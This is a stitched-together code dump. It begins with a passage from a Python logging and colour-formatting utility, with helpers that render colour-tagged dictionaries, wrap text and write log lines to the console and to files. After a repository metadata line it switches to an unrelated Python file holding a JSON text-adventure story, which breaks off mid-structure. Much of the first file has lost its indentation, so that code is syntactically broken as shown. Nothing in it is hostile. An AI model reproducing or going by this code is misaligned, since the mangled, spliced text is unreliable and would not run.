k = keys[n]
w = d.get(k)
ck=get_template_compo(k,'key_color',c1,colors_template)
cd=get_template_compo(k,'data_color',c2,colors_template)
s = s + f"#C0#'{ck}{k}#C0#':"
(nn, nd, ns) = decorated_data_recursion(0, w, '', colors_template, level)
cd = colors_template.get(k,{}).get('key_color',cd)
cd = colors_template.get(str(ns), {}).get('data_color', cd)
if k.lower().find('status') >= 0:
if str(ns).lower() == 'success':
cd='#GREEN#'
colors_template.update({'status_color': cd})
elif str(ns).lower().find('error') >= 0:
cd='#RED#'
colors_template.update({'status_color': cd})
elif str(ns).lower().find('warning') >= 0:
cd='#YELLOW#'
colors_template.update({'status_color': cd})
if k.lower().find('message') >= 0:
cd=colors_template.get('status_color','#WHITE#')
if type(ns) == type(''):
ds = f"#C0#'{cd}{ns}#C0#'"
else:
ds=f"{cd}{ns}#C0#"
s = s + ds
if n >= len(d) - 1:
s = s + c0+'}'
level = level - 1
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
else:
s = s + ', '
return decorated_data_recursion(n + 1, d, s, colors_template, level)
else:
return (0, '', s)
else:
return (0, '', s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data(data, colors_template=None):
    """Render `data` as a single color-tagged string using the resolved template."""
    colors_template = get_colors_template(colors_template)
    (dummy1, dummy2, thisText) = decorated_data_recursion(0, data, '', colors_template, 0)
    return str(thisText)
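# Illustrative call (a sketch): status/message keys get automatic coloring, so a
# 'success' status turns green and the message inherits the status color.
#   sample = {'status': 'success', 'message': 'all good', 'items': [1, 2, 3]}
#   print(colorized_string(decorated_data(sample)))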
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def bobbi_starr(msgtext, initial_indent="", subsequent_indent="", break_long_words=True, width=0):
    """Wrap color-tagged text to `width` visible characters per line.

    Characters inside #...# color tags do not count toward the line width.
    Note: initial_indent is applied to every output line; subsequent_indent and
    break_long_words are currently unused (lines always break at the width).
    """
    if width < 20:
        width = global_max_print_line_width
    text = fix_colors(msgtext)
    lines = []
    in_tag = False   # True while scanning inside a #...# color tag
    line = ''
    lw = 0           # count of visible (non-tag) characters on the current line
    for c in text:
        line = line + c
        if c == '#':
            in_tag = not in_tag
            continue
        if not in_tag:
            lw = lw + 1
            if lw == width:
                lines.append(line.strip())
                line = ''
                lw = 0
    lines.append(line.strip())
    newText = ""
    for ix in range(0, len(lines)):
        line = initial_indent + lines[ix]
        if ix < len(lines) - 1:
            line = line + "\n"
        newText = newText + line
    return newText
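# Illustrative call (a sketch): the #GREEN#/#C0# tags are not counted toward the
# 20-character width, so the visible text wraps as if the tags were absent.
#   wrapped = bobbi_starr('#GREEN#a fairly long tagged sentence#C0#', width=20)
#   print(wrapped)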
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def text_wrap(msgText, printLevel=0, width=-1):
    """Dedent msgText and wrap it, indenting each line by printLevel tabs."""
    indent = "\t" * printLevel
    if width < 20:
        width = global_max_print_line_width
    dedented_text = textwrap.dedent(msgText).strip()
    return bobbi_starr(dedented_text, initial_indent=indent, subsequent_indent=indent + '\t', break_long_words=True, width=width)
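# Illustrative call (a sketch): printLevel controls the tab indent of each line.
#   print(text_wrap('some long message to wrap', printLevel=2, width=40))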
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_msg(msg_text, **kwargs):
    if CONSOLE_ON:
        msgText = text_wrap(msg_text, kwargs.get('indent_level', 0), kwargs.get('width', 0))
        msgText = colorized_text(msgText, kwargs.get('color_template', ''))
        print(msgText)
    if FILELOG_ON or kwargs.get('msg_type', '').upper().find('ERROR') >= 0 or msg_text.upper().find('ERROR') >= 0:
        msgText = clean_colors(msg_text)
        # JSON-like log line (keys are unquoted and msg uses '=', so this is not strict JSON)
        msgJson1 = f"dt:'{str(datetime.datetime.utcnow())}', module:'{kwargs.get('process_name', '')}', msg='{msgText.strip()}'"
        msgJson = '{' + msgJson1 + '}\n'
        if kwargs.get('msg_type', '').upper().find('ERROR') >= 0 or msg_text.upper().find('ERROR') >= 0:
            errorsFile = kwargs.get('errors_file', '')
            if not errorsFile:
                errorsFile = thisApp.log_errors_file_name
            if errorsFile:
                with open(errorsFile, "a+") as f:
                    f.write(msgText + '\n')
        if FILELOG_ON:
            log_files = []
            xdebug_files = kwargs.get('debug_files', [])
            if xdebug_files:
                if isinstance(xdebug_files, str):
                    for name in xdebug_files.split(';'):
                        if name:
                            log_files.append(name)
                elif isinstance(xdebug_files, list):
                    for name in xdebug_files:
                        if name:
                            log_files.append(name)
            for logFile in log_files:
                if logFile:
                    with open(logFile, "a+") as f:
                        f.write(msgJson)
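# Illustrative call (a sketch; errors.log and debug.log are hypothetical paths):
# an ERROR msg_type is appended to the errors file in addition to any debug files.
#   log_msg('#RED#ERROR#C0#: disk full', msg_type='error', process_name='demo',
#           errors_file='errors.log', debug_files='debug.log;trace.log')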
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_message(process_id='', msgType='', msg_data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type='message'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', False)
if not msgtype_debug:
return
else:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', True)
if not msgtype_debug:
return
msg_type = msgType
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
if msg_type.lower().find('error') >= 0:
c1 = '#RED#'
c2 = '#YELLOW#'
elif msg_type.lower().find('success') >= 0 or msg_type.lower().find('ok') >= 0:
c1 = '#GREEN#'
c2 = '#YELLOW#'
elif msg_type.lower().find('warning') >= 0:
c1 = '#YELLOW#'
c2 = '#WHITE#'
else:
c1 = '#WHITE#'
c2 = '#YELLOW#'
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if msg_type:
msg_id = f"{c1}{msg_type.lower()} message#C0#: "
else:
msg_id = '#C0#: '
if not process_id:
msg_id = ''
if process_id:
msg_id = ' ' + msg_id
msg_data_prefix =''
msg_data = c2+decorated_data(msg_data, kwargs.get('colors_template',''))+'#C0#'
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
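# Illustrative call (a sketch): the process_entity/process_action kwargs are only
# used when msg_formatting='AUTO'; debug_level must be > 0 for anything to emit.
#   log_process_message('worker-1', 'warning', 'queue is almost full',
#                       debug_level=1, msg_formatting='AUTO',
#                       process_entity='queue', process_action='poll')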
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_result_message(process_id='', msgType='', msg_data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type='result_message'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', False)
if not msgtype_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
else:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', True)
if not msgtype_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
msg_type = msgType
indent_method = kwargs.get('indent_method', 'SAME_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
if msg_type.lower().find('error') >= 0:
c1 = '#RED#'
c2 = '#YELLOW#'
elif msg_type.lower().find('success') >= 0 or msg_type.lower().find('ok') >= 0:
c1 = '#GREEN#'
c2 = '#YELLOW#'
elif msg_type.lower().find('warning') >= 0:
c1 = '#YELLOW#'
c2 = '#MAGENTA#'
else:
c1 = '#WHITE#'
c2 = '#YELLOW#'
msg_type=''
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if msg_type:
msg_id = f"{c1}{msg_type.lower()} result message#C0#: "
else:
msg_id = '#C0#: '
if not process_id:
msg_id = ''
if process_id:
msg_id = ' ' + msg_id
msg_data_prefix =''
msg_data = c2+decorated_data(msg_data, kwargs.get('colors_template',''))+'#C0#'
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_result(process_id='',result_data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'result'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'result: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
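# Illustrative call (a sketch): an empty result_data is rendered in red, and
# data_name (when given) becomes the "name=" prefix of the logged value.
#   log_process_result('worker-1', {'rows': 42}, data_name='summary', debug_level=1)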
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_output(process_id='',result_data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'output'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
    msg_id = 'output: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_input(process_id='',data_name='',data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'input'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if data_name=='caller_area':
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'input: '
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
    if data is None:
msg_data_prefix='#WHITE#'+msg_data_prefix
msg_data='#RED#'+msg_data
else:
msg_data_prefix='#WHITE#'+msg_data_prefix
msg_data='#XBLUE#'+msg_data
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
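# Illustrative call (a sketch): inputs named 'caller_area' are suppressed unless
# a caller_area_input_debug kwarg explicitly enables them.
#   log_process_input('worker-1', 'batch_size', 100, debug_level=1)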
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_data(process_id='',data_name='',data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'data'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'data: '
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
if not data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
else:
msg_data_prefix='#WHITE#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_parameter(process_id='', param_prefix='', data_name='', data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'parameter'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if param_prefix:
param_prefix = param_prefix+':'
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}#C0#="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
if not data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
else:
msg_data='#YELLOW#'+msg_data
msg_data_prefix='#XBLUE#'+msg_data_prefix
msg_text = '#C0#' + msg_prefix + '#C0#' + param_prefix + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_start(process_id='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'start'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'start: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data =''
if kwargs.get('start_data',''):
msg_data = decorated_data(kwargs.get('start_data', ''), kwargs.get('colors_template', '')) + '#C0#'
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_finish(process_id='',result_data='', **kwargs):
# print(kwargs)
    debug_level = kwargs.get('debug_level', -1)
    filelog_enabled = kwargs.get('filelog_enabled', None)
    print_enabled = kwargs.get('print_enabled', None)
    if not (debug_level > 0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled)):
        return
msg_type = 'finish'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'finish: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
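# Illustrative pairing (a sketch): start/finish keep the caller's indent level,
# while the per-call message helpers above indent one level deeper by default.
#   log_process_start('worker-1', debug_level=1)
#   log_process_finish('worker-1', {'status': 'success'}, debug_level=1)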
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def x(p1='', **kwargs):
    print('p1 =', p1)
    p2 = kwargs.get('p2')
    print('p2 =', p2)
    p3 = kwargs.get('p3')
    print('p3 =', p3)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
module_identityDictionary = {
'module_ProgramName':module_ProgramName,
'module_id':module_id,
'module_version':module_version,
'module_is_externally_configurable':False,
}
module_configuration = {}
module_configuration = retrieve_module_configuration(__file__, module_identityDictionary, module_configuration, print_enabled=thisApp.DEBUG_ON, filelog_enabled=thisApp.FILELOG_ON, handle_as_init=False)
msg = f'module [{module_id}] [[version {module_version}]] loaded.'
if thisApp.get_module_debug_level(module_id):
print(colorized_string(msg))
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#x('xxxx',p2='222222',p4='4444444')
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# main
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if __name__ == '__main__':
print(__file__)
msgText="""This function wraps the #C0# input paragraph #C0#such that each line in th#C0#e paragraph is at most width characters long. The wrap method returns a list of output lines. The returned list is empty if the wrapped output has no content. """
print(msgText)
print('')
x = bobbi_starr(msgText, initial_indent="", subsequent_indent="", break_long_words=True, width=0)
print(x)
2a613d21a0dd4eb4981aa435cb768ba20a271fc6 | 84,367 | py | Python | main.py | mmhamman/Project1 | b04910fda5a346c9d568798c2c578071d75443f7 | ["MIT"]
#!/usr/bin/env python3
import sys
assert sys.version_info >= (3,9), "This script requires at least Python 3.9"
world = {
"uuid": "CDC045DF-724E-4E86-A2D1-A374D5E5636A",
"name": "Butterfly Effect",
"creator": "Twine",
"creatorVersion": "2.3.14",
"schemaName": "Harlowe 3 to JSON",
"schemaVersion": "0.0.6",
"createdAtMs": 1631503631401,
"passages": [
{
"name": "Bedroom",
"tags": "",
"id": "1",
"text": "You wake up exhausted from the night before. \n-Too many videogames- \nYou think to yourself but it's ok because it's a Sunday and you have all day ahead of you.\n\n[[NEXT->Bedroom2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Bedroom2",
"original": "[[NEXT->Bedroom2]]"
}
],
"hooks": [],
"cleanText": "You wake up exhausted from the night before. \n-Too many videogames- \nYou think to yourself but it's ok because it's a Sunday and you have all day ahead of you."
},
{
"name": "Bedroom2",
"tags": "",
"id": "2",
"text": "You look over at your clock.\n-12:00????-\nYou remember you and your friend Mark were going to the cave to hang out. That would be pretty fun or you could blow him off to play more Life is Weird. It's this cool game you got for your FunStation 4 about your choices and how they affect the story and based on your choices the game will have different outcomes. What was I talking about? Oh yea, what do you wanna do?\n\n[[PLAY->Bedroom3]]\n[[FRIEND->CaveEntrance]]",
"links": [
{
"linkText": "PLAY",
"passageName": "Bedroom3",
"original": "[[PLAY->Bedroom3]]"
},
{
"linkText": "FRIEND",
"passageName": "CaveEntrance",
"original": "[[FRIEND->CaveEntrance]]"
}
],
"hooks": [],
"cleanText": "You look over at your clock.\n-12:00????-\nYou remember you and your friend Mark were going to the cave to hang out. That would be pretty fun or you could blow him off to play more Life is Weird. It's this cool game you got for your FunStation 4 about your choices and how they affect the story and based on your choices the game will have different outcomes. What was I talking about? Oh yea, what do you wanna do?"
},
{
"name": "Bedroom3",
"tags": "",
"id": "3",
"score": -10,
"text": "Wow you are really lazy I can't believe you picked this option! Don't leave your friend waiting!\n\n[[NEXT->CaveEntrance]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CaveEntrance",
"original": "[[NEXT->CaveEntrance]]"
}
],
"hooks": [],
"cleanText": "Wow you are really lazy I can't believe you picked this option! Don't leave your friend waiting!"
},
{
"name": "CaveEntrance",
"tags": "",
"id": "4",
"text": "After a bit of a walk, just enough to realize you never had breakfast, you make it to the cave entrance. You see your friend waving. He is slightly taller than you with silver eyes and dark hair.\nFriend: Hey sleepyhead! About time you rolled around! I was getting worried something bad had happened.\nYou: Like what?\nFriend: I don't know maybe your mom did something about your videogame addiction. Were you up late again?\nYou: Guilty.\nYour friend shrugs his shoulders and then motions to the cave entrance. \nFriend: Ready to tackle the cave? My dad always said something was special about this place. Almost as if the cave chose us to be here today rather than ourselves.\nYou: Ugh you're weirding me out come one let's get this over with.\n\n[[ENTER->Cave]]",
"links": [
{
"linkText": "ENTER",
"passageName": "Cave",
"original": "[[ENTER->Cave]]"
}
],
"hooks": [],
